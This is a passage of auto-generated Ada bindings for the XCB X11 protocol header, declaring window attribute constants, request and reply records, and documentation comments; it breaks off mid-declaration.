Opcode for xcb_font. subtype xcb_font_error_t is xcb_value_error_t; -- /usr/include/xcb/xproto.h:1296 --* Opcode for xcb_match. subtype xcb_match_error_t is xcb_request_error_t; -- /usr/include/xcb/xproto.h:1301 --* Opcode for xcb_drawable. subtype xcb_drawable_error_t is xcb_value_error_t; -- /usr/include/xcb/xproto.h:1306 --* Opcode for xcb_access. subtype xcb_access_error_t is xcb_request_error_t; -- /usr/include/xcb/xproto.h:1311 --* Opcode for xcb_alloc. subtype xcb_alloc_error_t is xcb_request_error_t; -- /usr/include/xcb/xproto.h:1316 --* Opcode for xcb_colormap. subtype xcb_colormap_error_t is xcb_value_error_t; -- /usr/include/xcb/xproto.h:1321 --* Opcode for xcb_g_context. subtype xcb_g_context_error_t is xcb_value_error_t; -- /usr/include/xcb/xproto.h:1326 --* Opcode for xcb_id_choice. subtype xcb_id_choice_error_t is xcb_value_error_t; -- /usr/include/xcb/xproto.h:1331 --* Opcode for xcb_name. subtype xcb_name_error_t is xcb_request_error_t; -- /usr/include/xcb/xproto.h:1336 --* Opcode for xcb_length. subtype xcb_length_error_t is xcb_request_error_t; -- /usr/include/xcb/xproto.h:1341 --* Opcode for xcb_implementation. subtype xcb_implementation_error_t is xcb_request_error_t; -- /usr/include/xcb/xproto.h:1346 type xcb_window_class_t is (XCB_WINDOW_CLASS_COPY_FROM_PARENT, XCB_WINDOW_CLASS_INPUT_OUTPUT, XCB_WINDOW_CLASS_INPUT_ONLY) with Convention => C; -- /usr/include/xcb/xproto.h:1348 subtype xcb_cw_t is unsigned; XCB_CW_BACK_PIXMAP : constant unsigned := 1; XCB_CW_BACK_PIXEL : constant unsigned := 2; XCB_CW_BORDER_PIXMAP : constant unsigned := 4; XCB_CW_BORDER_PIXEL : constant unsigned := 8; XCB_CW_BIT_GRAVITY : constant unsigned := 16; XCB_CW_WIN_GRAVITY : constant unsigned := 32; XCB_CW_BACKING_STORE : constant unsigned := 64; XCB_CW_BACKING_PLANES : constant unsigned := 128; XCB_CW_BACKING_PIXEL : constant unsigned := 256; XCB_CW_OVERRIDE_REDIRECT : constant unsigned := 512; XCB_CW_SAVE_UNDER : constant unsigned := 1024; XCB_CW_EVENT_MASK : constant unsigned := 2048; XCB_CW_DONT_PROPAGATE : constant unsigned := 4096; XCB_CW_COLORMAP : constant unsigned := 8192; XCB_CW_CURSOR : constant unsigned := 16384; -- /usr/include/xcb/xproto.h:1354 --*< Overrides the default background-pixmap. The background pixmap and window must --have the same root and same depth. Any size pixmap can be used, although some --sizes may be faster than others. --If `XCB_BACK_PIXMAP_NONE` is specified, the window has no defined background. --The server may fill the contents with the previous screen contents or with --contents of its own choosing. --If `XCB_BACK_PIXMAP_PARENT_RELATIVE` is specified, the parent's background is --used, but the window must have the same depth as the parent (or a Match error --results). The parent's background is tracked, and the current version is --used each time the window background is required. --*< Overrides `BackPixmap`. A pixmap of undefined size filled with the specified --background pixel is used for the background. Range-checking is not performed, --the background pixel is truncated to the appropriate number of bits. --*< Overrides the default border-pixmap. The border pixmap and window must have the --same root and the same depth. Any size pixmap can be used, although some sizes --may be faster than others. --The special value `XCB_COPY_FROM_PARENT` means the parent's border pixmap is --copied (subsequent changes to the parent's border attribute do not affect the --child), but the window must have the same depth as the parent. --*< Overrides `BorderPixmap`. A pixmap of undefined size filled with the specified --border pixel is used for the border. Range checking is not performed on the --border-pixel value, it is truncated to the appropriate number of bits. --*< Defines which region of the window should be retained if the window is resized. --*< Defines how the window should be repositioned if the parent is resized (see --`ConfigureWindow`). --*< A backing-store of `WhenMapped` advises the server that maintaining contents of --obscured regions when the window is mapped would be beneficial. A backing-store --of `Always` advises the server that maintaining contents even when the window --is unmapped would be beneficial. In this case, the server may generate an --exposure event when the window is created. A value of `NotUseful` advises the --server that maintaining contents is unnecessary, although a server may still --choose to maintain contents while the window is mapped. Note that if the server --maintains contents, then the server should maintain complete contents not just --the region within the parent boundaries, even if the window is larger than its --parent. While the server maintains contents, exposure events will not normally --be generated, but the server may stop maintaining contents at any time. --*< The backing-planes indicates (with bits set to 1) which bit planes of the --window hold dynamic data that must be preserved in backing-stores and during --save-unders. --*< The backing-pixel specifies what value to use in planes not covered by --backing-planes. The server is free to save only the specified bit planes in the --backing-store or save-under and regenerate the remaining planes with the --specified pixel value. Any bits beyond the specified depth of the window in --these values are simply ignored. --*< The override-redirect specifies whether map and configure requests on this --window should override a SubstructureRedirect on the parent, typically to --inform a window manager not to tamper with the window. --*< If 1, the server is advised that when this window is mapped, saving the --contents of windows it obscures would be beneficial. --*< The event-mask defines which events the client is interested in for this window --(or for some event types, inferiors of the window). --*< The do-not-propagate-mask defines which events should not be propagated to --ancestor windows when no client has the event type selected in this window. --*< The colormap specifies the colormap that best reflects the true colors of the window. Servers --capable of supporting multiple hardware colormaps may use this information, and window man- --agers may use it for InstallColormap requests. The colormap must have the same visual type --and root as the window (or a Match error results). If CopyFromParent is specified, the parent's --colormap is copied (subsequent changes to the parent's colormap attribute do not affect the child). --However, the window must have the same visual type as the parent (or a Match error results), --and the parent must not have a colormap of None (or a Match error results). For an explanation --of None, see FreeColormap request. The colormap is copied by sharing the colormap object --between the child and the parent, not by making a complete copy of the colormap contents. --*< If a cursor is specified, it will be used whenever the pointer is in the window. If None is speci- --fied, the parent's cursor will be used when the pointer is in the window, and any change in the --parent's cursor will cause an immediate change in the displayed cursor. type xcb_back_pixmap_t is (XCB_BACK_PIXMAP_NONE, XCB_BACK_PIXMAP_PARENT_RELATIVE) with Convention => C; -- /usr/include/xcb/xproto.h:1455 subtype xcb_gravity_t is unsigned; XCB_GRAVITY_BIT_FORGET : constant unsigned := 0; XCB_GRAVITY_WIN_UNMAP : constant unsigned := 0; XCB_GRAVITY_NORTH_WEST : constant unsigned := 1; XCB_GRAVITY_NORTH : constant unsigned := 2; XCB_GRAVITY_NORTH_EAST : constant unsigned := 3; XCB_GRAVITY_WEST : constant unsigned := 4; XCB_GRAVITY_CENTER : constant unsigned := 5; XCB_GRAVITY_EAST : constant unsigned := 6; XCB_GRAVITY_SOUTH_WEST : constant unsigned := 7; XCB_GRAVITY_SOUTH : constant unsigned := 8; XCB_GRAVITY_SOUTH_EAST : constant unsigned := 9; XCB_GRAVITY_STATIC : constant unsigned := 10; -- /usr/include/xcb/xproto.h:1460 --* -- * @brief xcb_create_window_value_list_t -- * type xcb_create_window_value_list_t is record background_pixmap : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:1479 background_pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1480 border_pixmap : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:1481 border_pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1482 bit_gravity : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1483 win_gravity : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1484 backing_store : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1485 backing_planes : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1486 backing_pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1487 override_redirect : aliased xcb_bool32_t; -- /usr/include/xcb/xproto.h:1488 save_under : aliased xcb_bool32_t; -- /usr/include/xcb/xproto.h:1489 event_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1490 do_not_propogate_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1491 colormap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:1492 cursor : aliased xcb_cursor_t; -- /usr/include/xcb/xproto.h:1493 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1478 --* Opcode for xcb_create_window. --* -- * @brief xcb_create_window_request_t -- * type xcb_create_window_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1503 depth : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1504 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1505 wid : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1506 parent : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1507 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:1508 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:1509 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1510 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1511 border_width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1512 u_class : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1513 visual : aliased xcb_visualid_t; -- /usr/include/xcb/xproto.h:1514 value_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1515 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1502 --* -- * @brief xcb_change_window_attributes_value_list_t -- * type xcb_change_window_attributes_value_list_t is record background_pixmap : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:1522 background_pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1523 border_pixmap : aliased xcb_pixmap_t; -- /usr/include/xcb/xproto.h:1524 border_pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1525 bit_gravity : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1526 win_gravity : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1527 backing_store : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1528 backing_planes : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1529 backing_pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1530 override_redirect : aliased xcb_bool32_t; -- /usr/include/xcb/xproto.h:1531 save_under : aliased xcb_bool32_t; -- /usr/include/xcb/xproto.h:1532 event_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1533 do_not_propogate_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1534 colormap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:1535 cursor : aliased xcb_cursor_t; -- /usr/include/xcb/xproto.h:1536 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1521 --* Opcode for xcb_change_window_attributes. --* -- * @brief xcb_change_window_attributes_request_t -- * type xcb_change_window_attributes_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1546 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1547 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1548 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1549 value_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1550 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1545 type xcb_map_state_t is (XCB_MAP_STATE_UNMAPPED, XCB_MAP_STATE_UNVIEWABLE, XCB_MAP_STATE_VIEWABLE) with Convention => C; -- /usr/include/xcb/xproto.h:1553 --* -- * @brief xcb_get_window_attributes_cookie_t -- * type xcb_get_window_attributes_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:1563 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1562 --* Opcode for xcb_get_window_attributes. --* -- * @brief xcb_get_window_attributes_request_t -- * type xcb_get_window_attributes_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1573 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1574 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1575 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1576 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1572 --* -- * @brief xcb_get_window_attributes_reply_t -- * type xcb_get_window_attributes_reply_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_window_attributes_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1583 backing_store : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1584 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1585 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1586 visual : aliased xcb_visualid_t; -- /usr/include/xcb/xproto.h:1587 u_class : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1588 bit_gravity : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1589 win_gravity : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1590 backing_planes : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1591 backing_pixel : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1592 save_under : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1593 map_is_installed : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1594 map_state : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1595 override_redirect : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1596 colormap : aliased xcb_colormap_t; -- /usr/include/xcb/xproto.h:1597 all_event_masks : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1598 your_event_mask : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1599 do_not_propagate_mask : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1600 pad0 : aliased xcb_get_window_attributes_reply_t_array1823; -- /usr/include/xcb/xproto.h:1601 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1582 --* Opcode for xcb_destroy_window. --* -- * @brief xcb_destroy_window_request_t -- * type xcb_destroy_window_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1611 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1612 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1613 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1614 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1610 --* Opcode for xcb_destroy_subwindows. --* -- * @brief xcb_destroy_subwindows_request_t -- * type xcb_destroy_subwindows_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1624 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1625 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1626 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1627 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1623 type xcb_set_mode_t is (XCB_SET_MODE_INSERT, XCB_SET_MODE_DELETE) with Convention => C; -- /usr/include/xcb/xproto.h:1630 --* Opcode for xcb_change_save_set. --* -- * @brief xcb_change_save_set_request_t -- * type xcb_change_save_set_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1642 mode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1643 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1644 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1645 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1641 --* Opcode for xcb_reparent_window. --* -- * @brief xcb_reparent_window_request_t -- * type xcb_reparent_window_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1655 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1656 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1657 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1658 parent : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1659 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:1660 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:1661 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1654 --* Opcode for xcb_map_window. --* -- * @brief xcb_map_window_request_t -- * type xcb_map_window_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1671 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1672 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1673 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1674 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1670 --* Opcode for xcb_map_subwindows. --* -- * @brief xcb_map_subwindows_request_t -- * type xcb_map_subwindows_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1684 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1685 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1686 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1687 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1683 --* Opcode for xcb_unmap_window. --* -- * @brief xcb_unmap_window_request_t -- * type xcb_unmap_window_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1697 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1698 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1699 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1700 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1696 --* Opcode for xcb_unmap_subwindows. --* -- * @brief xcb_unmap_subwindows_request_t -- * type xcb_unmap_subwindows_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1710 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1711 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1712 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1713 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1709 subtype xcb_config_window_t is unsigned; XCB_CONFIG_WINDOW_X : constant unsigned := 1; XCB_CONFIG_WINDOW_Y : constant unsigned := 2; XCB_CONFIG_WINDOW_WIDTH : constant unsigned := 4; XCB_CONFIG_WINDOW_HEIGHT : constant unsigned := 8; XCB_CONFIG_WINDOW_BORDER_WIDTH : constant unsigned := 16; XCB_CONFIG_WINDOW_SIBLING : constant unsigned := 32; XCB_CONFIG_WINDOW_STACK_MODE : constant unsigned := 64; -- /usr/include/xcb/xproto.h:1716 type xcb_stack_mode_t is (XCB_STACK_MODE_ABOVE, XCB_STACK_MODE_BELOW, XCB_STACK_MODE_TOP_IF, XCB_STACK_MODE_BOTTOM_IF, XCB_STACK_MODE_OPPOSITE) with Convention => C; -- /usr/include/xcb/xproto.h:1726 --* -- * @brief xcb_configure_window_value_list_t -- * type xcb_configure_window_value_list_t is record x : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:1738 y : aliased bits_stdint_intn_h.int32_t; -- /usr/include/xcb/xproto.h:1739 width : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1740 height : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1741 border_width : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1742 sibling : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1743 stack_mode : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1744 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1737 --* Opcode for xcb_configure_window. --* -- * @brief xcb_configure_window_request_t -- * type xcb_configure_window_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_configure_window_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1754 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1755 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1756 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1757 value_mask : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1758 pad1 : aliased xcb_configure_window_request_t_array1823; -- /usr/include/xcb/xproto.h:1759 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1753 type xcb_circulate_t is (XCB_CIRCULATE_RAISE_LOWEST, XCB_CIRCULATE_LOWER_HIGHEST) with Convention => C; -- /usr/include/xcb/xproto.h:1762 --* Opcode for xcb_circulate_window. --* -- * @brief xcb_circulate_window_request_t -- * type xcb_circulate_window_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1774 direction : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1775 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1776 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1777 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1773 --* -- * @brief xcb_get_geometry_cookie_t -- * type xcb_get_geometry_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:1784 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1783 --* Opcode for xcb_get_geometry. --* -- * @brief xcb_get_geometry_request_t -- * type xcb_get_geometry_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1794 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1795 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1796 drawable : aliased xcb_drawable_t; -- /usr/include/xcb/xproto.h:1797 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1793 --* -- * @brief xcb_get_geometry_reply_t -- * type xcb_get_geometry_reply_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_geometry_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1804 depth : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1805 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1806 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1807 root : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1808 x : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:1809 y : aliased bits_stdint_intn_h.int16_t; -- /usr/include/xcb/xproto.h:1810 width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1811 height : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1812 border_width : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1813 pad0 : aliased xcb_get_geometry_reply_t_array1823; -- /usr/include/xcb/xproto.h:1814 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1803 --* -- * @brief xcb_query_tree_cookie_t -- * type xcb_query_tree_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:1821 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1820 --* Opcode for xcb_query_tree. --* -- * @brief xcb_query_tree_request_t -- * type xcb_query_tree_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1831 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1832 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1833 window : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1834 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1830 --* -- * @brief xcb_query_tree_reply_t -- * type xcb_query_tree_reply_t_array2138 is array (0 .. 13) of aliased bits_stdint_uintn_h.uint8_t; type xcb_query_tree_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1841 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1842 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1843 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1844 root : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1845 parent : aliased xcb_window_t; -- /usr/include/xcb/xproto.h:1846 children_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1847 pad1 : aliased xcb_query_tree_reply_t_array2138; -- /usr/include/xcb/xproto.h:1848 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1840 --* -- * @brief xcb_intern_atom_cookie_t -- * type xcb_intern_atom_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:1855 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1854 --* Opcode for xcb_intern_atom. --* -- * @brief xcb_intern_atom_request_t -- * type xcb_intern_atom_request_t_array1823 is array (0 .. 1) of aliased bits_stdint_uintn_h.uint8_t; type xcb_intern_atom_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1865 only_if_exists : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1866 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1867 name_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1868 pad0 : aliased xcb_intern_atom_request_t_array1823; -- /usr/include/xcb/xproto.h:1869 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1864 --* -- * @brief xcb_intern_atom_reply_t -- * type xcb_intern_atom_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1876 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1877 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1878 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1879 atom : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1880 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1875 --* -- * @brief xcb_get_atom_name_cookie_t -- * type xcb_get_atom_name_cookie_t is record sequence : aliased unsigned; -- /usr/include/xcb/xproto.h:1887 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1886 --* Opcode for xcb_get_atom_name. --* -- * @brief xcb_get_atom_name_request_t -- * type xcb_get_atom_name_request_t is record major_opcode : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1897 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1898 length : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1899 atom : aliased xcb_atom_t; -- /usr/include/xcb/xproto.h:1900 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1896 --* -- * @brief xcb_get_atom_name_reply_t -- * type xcb_get_atom_name_reply_t_array2015 is array (0 .. 21) of aliased bits_stdint_uintn_h.uint8_t; type xcb_get_atom_name_reply_t is record response_type : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1907 pad0 : aliased bits_stdint_uintn_h.uint8_t; -- /usr/include/xcb/xproto.h:1908 sequence : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1909 length : aliased bits_stdint_uintn_h.uint32_t; -- /usr/include/xcb/xproto.h:1910 name_len : aliased bits_stdint_uintn_h.uint16_t; -- /usr/include/xcb/xproto.h:1911 pad1 : aliased xcb_get_atom_name_reply_t_array2015; -- /usr/include/xcb/xproto.h:1912 end record with Convention => C_Pass_By_Copy; -- /usr/include/xcb/xproto.h:1906 type xcb_prop_mode_t is (XCB_PROP_MODE_REPLACE, XCB_PROP_MODE_PREPEND, XCB_PROP_MODE_APPEND) with Convention => C; -- /usr/include/xcb/xproto.h:1915 --*< Discard the previous property value and store the new data. --*< Insert the new data before the beginning of existing data. The `format` must --match existing property value. If the property is undefined, it is treated as --defined with the correct type and format with zero-length data. --*< Insert the new data after the beginning of existing data. The `format` must --match existing property value. If the property is undefined, it is treated as --defined with the correct type and format with zero-length data. --* Opcode for xcb_change_property. --* -- * @brief xcb_change_property_request_t -- * type xcb_change_property_request_t_array1897 is 